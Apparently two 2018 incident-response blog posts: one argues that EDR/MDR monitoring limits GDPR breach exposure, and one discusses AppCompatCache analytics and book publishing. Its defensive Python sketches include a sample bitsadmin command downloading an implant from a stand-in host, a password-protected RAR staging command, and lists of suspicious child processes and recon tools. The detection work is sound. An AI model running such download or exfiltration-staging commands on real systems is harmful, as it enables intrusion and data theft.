Tuesday, May 08, 2018

EDR Obviates Compliance

Okay, you'll have to excuse me for the title of this blog post...I needed something to get your attention, and get you to read this, because it's important. I know that stating that "EDR obviates compliance" is going to cause a swirl of emotions in anyone's mind, and my intention was to get you to read on and hear me out; 280 characters simply is not enough to share this line of reasoning.

GDPR is just around the corner, and Article 4 of the GDPR defines a "personal data breach" as...

...‘personal data breach’ means a breach of security leading to the accidental or unlawful destruction, loss, alteration, unauthorised disclosure of, or access to, personal data transmitted, stored or otherwise processed...

Something to be aware of is that this definition includes ransomware, as it covers both "access to" and "alteration" of personal data.

As security professionals have been saying for quite some time now, breaches of your perimeter are going to happen; it's simply inevitable.  However, per GDPR, it's not a reportable breach until something happens with respect to 'personal data'.  The simple fact is that without adequate/suitable instrumentation and visibility, you won't know whether personal data has been accessed during a breach.  EDR provides that visibility.

Where Are We Now?
Right now, we're "right of breach".  Most organizations are simply unprepared for breaches to occur, and breach identification comes in the form of third-party external notification.  This notification comes weeks or even months after the initial intrusion occurred, during which time the dearth of instrumentation and "evidence decay" make it nearly impossible to determine, with any degree of certainty, what the adversary may have done.

The 2018 Nuix Black Report states that 98% of those surveyed said they could breach the perimeter of a target organization and exfil data in 15 hrs or less.  Compare that to the 2017 Ponemon Institute report, which put the 'dwell time' (the time between a breach actually occurring and it being detected) at 191 days; even now, dwell time remains in the triple digits.  It hardly seems fair, but that's reality in today's terms.

Where we need to be is "left of breach".  We know breaches are going to occur, and we know that clean-up is going to be messy, so what we need to do is get ahead of the game and be prepared.  It's not unlike boxing...if you step into the ring with gloves on, you know you're going to get hit, so it behooves you to get your gloves up and move around a bit, lessening the impact and effect of your opponent's punches. In cybersecurity, we move "left of breach" by employing monitored EDR (MDR), so that breaches can be detected and responded to early in the adversary's attack cycle, allowing us to contain and eradicate the adversary before they're able to access "critical value data", or CVD.  CVD can consist of "personal data", or PII; credit card data, or PCI; healthcare data, or PHI; or it can be intellectual property, or IP.  Regardless of what your CVD is, the point is that you want to detect, respond to, and stop the bad guy before they're able to access it, and the only way you can do that is to instrument your infrastructure for visibility.

Costs
Chris Pogue wrote this blog post, addressing the "cost of breach" topic, almost three years ago.  With the help of our wonderful marketing department, I recently gave this webinar on reducing costs associated with breaches.  Things haven't changed...breaches are becoming more expensive; more expensive to clean up, more expensive in terms of down-time and lapses in productivity, and more expensive in terms of legal fees and fines.

While researching information for the webinar, one of the things I ran across was the fines that would have been associated with GDPR, had GDPR been in effect at the time of the Equifax breach.  In 2016, Equifax reportedly earned $3.145B USD.  High-end GDPR fines can be "20M euros or 4% of world-wide operating revenue, whichever is greater", bringing the fine to $125.8M USD.  That's just the GDPR fine; it does not include direct costs associated with the IR response and investigation, subsequent notification, nor any indirect costs.
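
If you want to run the numbers yourself, here's a minimal back-of-the-envelope sketch; the EUR-to-USD exchange rate is an assumption for illustration only:

```python
# Back-of-the-envelope GDPR fine math for the Equifax example; the
# EUR-to-USD rate is an assumption for illustration only.
EUR_TO_USD = 1.20
revenue_usd = 3.145e9                      # reported 2016 revenue

flat_cap_usd = 20e6 * EUR_TO_USD           # "20M euros..."
pct_cap_usd = 0.04 * revenue_usd           # "...or 4% of worldwide revenue"

fine_usd = max(flat_cap_usd, pct_cap_usd)  # "...whichever is greater"
print(f"Potential GDPR fine: ${fine_usd / 1e6:.1f}M USD")  # -> $125.8M USD
```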

On 1 May, Alabama became the 50th US state to enact a data breach notification law, SB 318.  As you read over the stipulations regarding reporting detailed in the law, keep in mind that the laws of the 50 US states are all different.  If you store or process the personal data of US citizens, the cost associated with simply determining to which states you actually have to report is enormous!  And that's before you even report...it doesn't include the actual cost of notification; it's just the cost of determining to whom (which states) you need to report!

EDR/MDR
So where does endpoint detection and response (EDR) come in?

I've been doing DFIR work for about two decades now, and most of the work I've done has been after an incident has occurred.  Early on, the work involved a system or two thought to be infected or compromised in some manner, but it was always well after the supposed infection or compromise occurred.  In most cases, questions involving things like, "...what data was taken?" simply could not be answered.  Either the information to answer the question didn't exist due to evidence decay, or it didn't exist because that information was never actually recorded or logged.

EDR/MDR solutions allow you to detect a breach early in the adversary's attack cycle, as one of the things monitored by most, if not all, EDR tools is the processes executed on systems.  Yes, you get a lot of 'normal' user stuff (allowing you to detect fraud and insider threats), but you also get a detailed look at the adversary's activities.

To see some really good examples of process trees showing what various attacks look like, go to Phil Burdette's Twitter feed.  One tweet includes an example of a phish, with the user clicking "Enable Content" on a malicious document, leading to the implant being downloaded via bitsadmin.  Another tweet illustrates a great example of credential theft.  I could go on and on about this, but I think that the point has been made...EDR gives you a level of visibility that you don't get through any other instrumentation.
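
To give a sense of what that visibility enables, here's a minimal sketch of process-tree alerting along the lines of the phish example above; the event fields and the parent/child pairings are my own illustrative assumptions, not any specific EDR vendor's schema:

```python
# A minimal sketch of process-tree alerting; fields and pairings are
# illustrative assumptions, not a particular product's schema.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe"}
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "bitsadmin.exe"}

def check_event(event):
    """Flag an Office app spawning a shell or downloader: the classic
    'user clicked Enable Content on a malicious document' pattern."""
    if (event["parent"].lower() in OFFICE_PARENTS
            and event["child"].lower() in SUSPICIOUS_CHILDREN):
        return f"ALERT: {event['parent']} spawned {event['child']}: {event['cmdline']}"
    return None

events = [
    {"parent": "explorer.exe", "child": "winword.exe",
     "cmdline": "WINWORD.EXE invoice.doc"},
    {"parent": "winword.exe", "child": "bitsadmin.exe",
     "cmdline": "bitsadmin /transfer job http://example[.]com/implant.exe"},
]

for event in events:
    alert = check_event(event)
    if alert:
        print(alert)
```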

Where I've used this information to great effect was in detecting an adversary's activities within a client's infrastructure several years ago; the tool being used at the time alerted on the use of an archive utility known as "Rar".  The adversary had renamed the executable so that it was no longer 'rar.exe', but adding a password to protect the archive is not something the adversary could change, and that's what was detected in this case.  So, we had the fact that data was marshaled and archived for exfiltration (along with the password), and we further saw that after exfiltrating the archives, the adversary deleted the archived data.  However, once we got an image of the system, we were able to carve unallocated space and recover a number of the archives, and using the adversary's password, we were able to open the recovered archives and see exactly what data was taken.

Today, the way to address this behavior is to go beyond alerting on the condition and instead block the process itself.  The same is true with other adversary behaviors; intelligence gives us excellent insight into adversary behaviors, and using that insight, we can implement our EDR solution to alert on some things and, when other specific conditions are met, prevent those actions from completing.  We can further contain the adversary by isolating the affected system on the network.
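
As an illustration, here's a minimal sketch of a rule that keys on the archive-password switch rather than the executable name; the -p/-hp switches are standard WinRAR command-line options, while the detection logic around them is purely illustrative:

```python
import re

# A minimal sketch: alert on (or block) any archiver invocation that
# sets an archive password, regardless of what the executable has been
# renamed to. The alert/block plumbing is hypothetical.
ADD_TO_ARCHIVE = re.compile(r"^\S+\s+a\s", re.IGNORECASE)   # 'a' = add files to archive
PASSWORD_SWITCH = re.compile(r"\s-h?p\S+", re.IGNORECASE)   # -p<pwd> or -hp<pwd>

def should_block(cmdline):
    # The adversary can rename rar.exe to anything, but can't avoid the
    # password switch if they want a password-protected archive.
    return bool(ADD_TO_ARCHIVE.search(cmdline) and PASSWORD_SWITCH.search(cmdline))

print(should_block(r"svchost.exe a -hpP@ssw0rd out.rar C:\data\*"))  # True (block)
print(should_block(r"rar.exe a out.rar C:\data\*"))                  # False
```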

In March of this year, the City of Atlanta was hit with Samsam ransomware.  Interestingly enough, Secureworks, a security MSSP located within the corporate limits of the city, has a good bit of documentation on the methodology used by the adversary that deploys the ransomware; had the city had an EDR/MDR solution in place prior to the incident, they would have been able to detect and respond to the initial breach before the adversary was able to deploy the ransomware.

Benefits
Given all this, the benefits of employing an EDR/MDR solution are:

1. The solution becomes part of your budget.  Employing an EDR/MDR solution is something you plan for, and include in your annual budget.  Breaches are rarely planned for.

2.  You now have definitive data illustrating the actions taken by an adversary prior to your containment and eradication procedures. You have a record of the commands they ran, the actions they took, and hence their behaviors.  You know exactly where they are within your infrastructure, and you can track back to how they got there, meaning that you can quickly contain and eradicate them.

3. Due to early detection and response, you now have definitive data to support not having to report the breach.  Let's say that you detect someone on your network running the "whoami" command; this is a behavior that's been observed with many adversaries (a minimal detection sketch follows this list).  Alerting on this behavior will allow you to respond to the adversary during their initial recon phase, before they're able to perform credential theft, privilege escalation, and lateral movement.  All of their activity and behavior is recorded, and it's a short list, because you've detected and responded to them very early in their attack cycle.  As 'personal data' was not accessed, you've obviated your need to report, and avoided the costs associated with fines, notification, clean-up, etc.
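
Here's that sketch; the command list and the event fields are illustrative assumptions, not a specific product's schema:

```python
# A minimal sketch of alerting on discovery/recon commands early in the
# attack cycle; commands and event shape are illustrative assumptions.
RECON_COMMANDS = {"whoami", "net", "ipconfig", "systeminfo", "nltest"}

def recon_alerts(process_events):
    for event in process_events:
        exe = event["image"].rsplit("\\", 1)[-1].lower()
        if exe.endswith(".exe"):
            exe = exe[:-4]
        if exe in RECON_COMMANDS:
            yield f"Recon on {event['host']}: {event['cmdline']}"

events = [
    {"host": "FS01", "image": r"C:\Windows\System32\whoami.exe",
     "cmdline": "whoami /all"},
]

for alert in recon_alerts(events):
    print(alert)  # -> Recon on FS01: whoami /all
```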

Monday, May 07, 2018

Tools, Books, Lessons Learned

Tools
As part of my Sunday morning reading a bit ago, I was fascinated by an evolving tweet thread...Eric recently tweeted some random threat hunting advice involving shimcache data.  In response, Nick tweeted regarding an analytic approach to using shimcache/appcompatcache data, at scale, along with AmCache data.  Nick also provided a link to the FireEye blog post that describes their AppCompatProcessor tool.

I really like this approach, and I think that it's a fantastic step forward, not only for single-system analytics (analyzing one system through traditional "dead box" analysis), but also with respect to an enterprise-wide approach to threat hunting and response.  In many ways, threat hunting and response is the next logical step in DFIR work, isn't it?  Taking what you learned from one system and expanding it to many systems just kinda makes sense, and it looks as though what the FireEye folks did was take what they learned from many single-system examinations and develop a process, with an accompanying tool, from that information.

Even from a single-system analysis perspective, there are still a number of analysts within the community who either aren't parsing the AppCompatCache data as a matter of course, or are misinterpreting the time stamp data altogether. Back in December 2016, Matt Bromiley wrote an article describing some of the important aspects of the AppCompatCache data ("important" with respect to interpretation of the data).  Also, be sure to thoroughly read the section named "AppCompatSecrets" here, as well as Luis's article here.  A correct understanding of the data and its context is important going forward.

From an enterprise perspective, there are tools that do nothing more than collect and parse this data from systems, but provide no analytics on the data itself; in short, they simply dump this massive trove of data on the analyst.  The analytic approach described by the FireEye folks is similar in nature to the Hamming distance, something I learned about while taking Dr. Hamming's seminar at NPS; in short, the closer the temporal execution of two entries (the smaller the Hamming distance), the stronger the tcorr value.  This can be applied to great effect as a threat hunting technique across the enterprise.  In the case of AppCompatCache data, the time stamp does not indicate temporal execution; rather, what matters is a combination of a flag value and the position of the entry, in the order in which it's stored within the Registry value.  The "temporal" aspect, in this case, refers to the location of entries in the data with respect to each other.
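
To make the positional-proximity idea concrete, here's a minimal sketch; this is my own simplified reconstruction of the concept, not the actual AppCompatProcessor tcorr implementation:

```python
from collections import Counter

# A minimal sketch of positional proximity in AppCompatCache data: the
# order of entries within the value stands in for temporal proximity,
# so entries that consistently appear near a known-bad entry across
# many hosts are worth a closer look.
def correlate(hosts, target, window=2):
    neighbors = Counter()
    for entries in hosts.values():     # entries: cache names, in stored order
        for i, name in enumerate(entries):
            if name == target:
                lo, hi = max(0, i - window), i + window + 1
                neighbors.update(n for n in entries[lo:hi] if n != target)
    return neighbors.most_common()

hosts = {
    "HOST1": ["calc.exe", "evil.exe", "rar.exe", "net.exe"],
    "HOST2": ["evil.exe", "rar.exe", "whoami.exe"],
}
print(correlate(hosts, "evil.exe"))  # rar.exe co-occurs on both hosts
```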

This can also be applied to single-system dead box analysis, when you look at it as a system, and include not just the System hive, but also the copy in the RegBack folder, any copies that exist in VSCs, and the hive within a memory dump.
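
As a quick sketch of what "looking at it as a system" might mean in practice, the following gathers every available copy of the System hive from a mounted image; the mount points and the method of exposing VSCs are assumptions for illustration:

```python
import glob
import os

# A minimal sketch (hypothetical mount points): gather every available
# copy of the System hive so each AppCompatCache snapshot can be
# parsed and compared.
MOUNT = r"X:\mounted_image"

candidates = [
    os.path.join(MOUNT, r"Windows\System32\config\SYSTEM"),
    os.path.join(MOUNT, r"Windows\System32\config\RegBack\SYSTEM"),
]

# Volume shadow copies exposed as separate mount points, e.g. X:\vss1
candidates += glob.glob(r"X:\vss*\Windows\System32\config\SYSTEM")

for hive in (p for p in candidates if os.path.isfile(p)):
    print(f"Parse AppCompatCache from: {hive}")
```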

I'd recently blogged about using several Registry and Registry-like artifacts in a much smaller approach to "analytics", looking at the use and correlation of multiple sources of data on a single system, with my base assumption being that of single system dead box analysis.  I figured, hey, it's a place to start.

Getting a Book Published
I recently had an opportunity to read Scar's blog post entitled, Finding a Publisher For Your Book.  I found it fascinating because what she wrote about is not too dissimilar from my own experiences.

I have not read her book, Windows Forensic Cookbook.  In fact, I wasn't aware of it until recently.  Once I found out about it, I checked the Amazon site and didn't see any reviews of the book; I'm not surprised...after all, this is the DFIR "community"...but I did hope to get a sense of the material within the book.  So, this isn't a book review, but rather commentary in solidarity with her experiences.

Like Scar, I've put a lot of work into writing a manuscript, only to get the proofs back for review and think...what?  In one case, every single instance of "plugin" had been changed to "plug-in" throughout a chapter. Uh...no.  My response back to the copy editor was simply to state at the beginning of the chapter, "...change it back...all of it."

Scar's comments about expectations caught my attention, as well, particularly when the publisher wanted a chapter review turned around in 48 hrs.  What?!?  This is one of those things you have to be prepared for when working with publishers...they simply do not understand their suppliers, at all.  A publisher or editor works on getting multiple books out, that's what they do all day.  However, those of us writing books and providing material do other things all day, and write books when we have time.  That's right...we do the stuff during the day that makes us qualified to write books, and then actually get to write the books in our copious "free time", after putting in a full day or week of work.  These crazy deadlines are something I've pushed against, more so since I've developed greater credibility with the publisher by writing more books.  When my tech editor is working full days just like everyone else and gets a 35+ page chapter with a demand to have the review returned within 48 hrs, that's simply an unrealistic expectation that needs to be addressed up front.

I've been writing books for a while now...it didn't occur to me just how long I've been doing it until last week.  I have a book in the process of being published right now...I'm waiting on the proofs to come back for review...and I submitted a prospectus recently for another book, and the reviews of the proposal I sent in have started coming back.  One reviewer referred to WFA 1/e, published in 2005; this means that I actually started working on it late in 2003, or really in 2004.  And that wasn't my first book. All of this is to say that when I see someone write a blog post where they share their experiences in writing a book and getting it published, what I find most interesting about it is that nothing seems to have changed.  As such, a lot of what Scar wrote in her blog post rings very true, even to this day.

Finally, I've mentioned this before, but I'll say it again...over the years, I've heard stories about issues folks have had working with publishers; I've had some of my own, but I like to think that I've learned from them.  Some folks don't get beyond the proposal stage for their book, and some have gotten to a signed contract but dropped out due to apparently arbitrary changes made by the editorial staff after the contract was signed by both parties.  What I proposed to the publisher I've worked with was to create a liaison position, one where I would work directly with authors (singles, groups) to help them navigate the apparent labyrinth of going from a blank sheet of paper to a published book, using what I've learned over the years.  This never really went anywhere, in part due to turnover at the publisher...once I had found a champion for the idea, that person left the company.  The fact that I attempted this three times without success, and that the publisher hasn't come back to me to pursue it, tells me that they (the publisher) are happy with the status quo.

If you're interested in writing a book but hesitant, you don't have to be.  Read over Scar's blog post, ask questions, etc., before you make a decision to commit to writing a book.  It isn't easy, but it can be done.  If your main fear about writing a book is that someone else is going to read it and be critical, keep in mind that no one will be as passionate as you about what you write.

Lessons Learned
I was engaged in an exchange with a trusted and respected colleague recently, and he said something to me that really struck a chord...he said that if I wanted to progress in the direction we were discussing, I've got to stop "giving stuff away for free".  He was referring to my blog (I think), and his point was well taken.  If you're like me, and really (REALLY) enjoy the work...the discovery, the learning, solving a problem in what may be a unique manner, etc...then what does something like writing books and blog posts get you?  I'm not sure what it gets others, but it doesn't lead to being able to conduct analysis, that's for sure.  I mean, why should it, right?  If I put in writing what I did or would do, and someone else can replicate it (like a recipe for tollhouse cookies), then why reach out and say, "Hey, Harlan...I could really use your help on this...", or "...can you analyze these images for malicious activity..."?